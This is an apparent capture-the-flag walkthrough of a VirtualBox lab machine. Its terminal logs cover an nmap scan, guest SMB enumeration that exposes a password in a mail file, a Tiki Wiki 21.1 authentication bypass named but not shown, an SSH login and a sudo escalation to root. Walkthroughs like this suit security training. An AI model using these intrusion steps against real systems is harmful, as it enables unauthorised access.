└─$ nmap -sSCV -p 22,80,139,445  192.168.71.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 04:17 EDT
Nmap scan report for 192.168.71.109
Host is up (0.0010s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a3:d8:4a:89:a9:25:6d:07:c5:3d:76:28:06:ed:d1:c0 (RSA)
|   256 e7:b2:89:05:54:57:dc:02:f4:8c:3a:7c:55:8b:51:aa (ECDSA)
|_  256 fd:77:07:2b:4a:16:3a:01:6b:e0:00:0c:0a:36:d8:2f (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry 
|_/tiki/
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:DF:CD:2A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2025-04-21T08:17:41
|_  start_date: N/A


//port 139,
└─$ netexec smb 192.168.71.109  -u guest -p '' --shares
SMB         192.168.71.109  445    UBUNTU           [*] Unix - Samba (name:UBUNTU) (domain:) (signing:False) (SMBv1:False)
SMB         192.168.71.109  445    UBUNTU           [+] \guest: (Guest)
SMB         192.168.71.109  445    UBUNTU           [*] Enumerated shares
SMB         192.168.71.109  445    UBUNTU           Share           Permissions     Remark
SMB         192.168.71.109  445    UBUNTU           -----           -----------     ------
SMB         192.168.71.109  445    UBUNTU           print$                          Printer Drivers
SMB         192.168.71.109  445    UBUNTU           Notes           READ            My Notes
SMB         192.168.71.109  445    UBUNTU           IPC$                            IPC Service (ubuntu server (Samba, Ubuntu))



└─$ smbclient \\\\192.168.71.109\\Notes --user= guest
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 29 09:52:09 2020
  ..                                  D        0  Thu Jul 30 15:32:11 2020
  Mail.txt                            N      244  Wed Jul 29 09:52:05 2020

		19992176 blocks of size 1024. 10040144 blocks available
smb: \> more Mail.txt 

Hi Silky
because of a current Breach we had to change all Passwords,
please note that it was a 0day, we don't know how he made it.

Your new CMS-password is now 51lky571k1, 
please investigate how he made it into our Admin Panel.

Cheers Boss.

└─$ sudo dirsearch -u http://192.168.71.109
[04:23:58] 200 -   42B  - /robots.txt
[04:23:59] 403 -  279B  - /server-status
[04:23:59] 403 -  279B  - /server-status/
[04:24:04] 301 -  315B  - /tiki  ->  http://192.168.71.109/tiki/
[04:24:04] 200 -  526B  - /tiki/doc/stable.version

//and now we can login with silky. but nothing useful info we found.

//from dbexploit, Tiki Wiki CMS Groupware 21.1 - Authentication Bypass 
//but we cannot get the version. try this exploit, it works. we login with admin, and the wersion is indeed 21.1

http://192.168.71.109/tiki/tiki-index.php?page=Credentials
silky:Agy8Y7SPJNXQzqA 

$ ssh silky@192.168.xxx

silky@ubuntu:~$ sudo -l
[sudo] Passwort für silky: 
Passende Defaults-Einträge für silky auf ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen:
    (ALL : ALL) ALL
silky@ubuntu:~$ sudo /bin/bash
root@ubuntu:/home/silky# id
uid=0(root) gid=0(root) Gruppen=0(root)
root@ubuntu:/home/silky# cd /root
root@ubuntu:~# ls
flag.txt
root@ubuntu:~# cat flag.txt 

 ██████╗ ██████╗ ███╗   ██╗ ██████╗ ██████╗  █████╗ ████████╗██╗   ██╗██╗      █████╗ ████████╗██╗ ██████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔═══██╗████╗  ██║██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝██║   ██║██║     ██╔══██╗╚══██╔══╝██║██╔═══██╗████╗  ██║██╔════╝██║
██║     ██║   ██║██╔██╗ ██║██║  ███╗██████╔╝███████║   ██║   ██║   ██║██║     ███████║   ██║   ██║██║   ██║██╔██╗ ██║███████╗██║
██║     ██║   ██║██║╚██╗██║██║   ██║██╔══██╗██╔══██║   ██║   ██║   ██║██║     ██╔══██║   ██║   ██║██║   ██║██║╚██╗██║╚════██║╚═╝
╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║  ██║██║  ██║   ██║   ╚██████╔╝███████╗██║  ██║   ██║   ██║╚██████╔╝██║ ╚████║███████║██╗
 ╚═════╝ ╚═════╝ ╚═╝  ╚═══╝ ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝    ╚═════╝ ╚══════╝╚═╝  ╚═╝   ╚═╝   ╚═╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝
                                                                                                                                
You did it ^^
I hope you had fun.
Share your flag with me on Twitter: S1lky_1337


flag:88d8120f434c3b4221937a8cd0668588
